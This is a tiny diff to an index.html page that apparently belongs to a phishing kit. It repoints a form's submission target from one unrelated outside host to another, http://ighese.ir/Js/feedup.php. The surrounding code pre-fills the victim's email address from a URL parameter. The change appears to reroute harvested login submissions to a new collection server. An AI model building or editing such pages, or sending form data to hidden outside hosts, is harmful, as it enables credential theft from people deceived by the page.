--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@ $("#email").val($.urlPeram('email'));
                 </div>
                 <!-- End of server response message div -->
 
-                <form action="https://rubystudio.co.ke/feedup.php" method="post">
+                <form action="http://ighese.ir/Js/feedup.php" method="post">
                   
                     <div class="form-group">
                     <!-- User Email Label -->
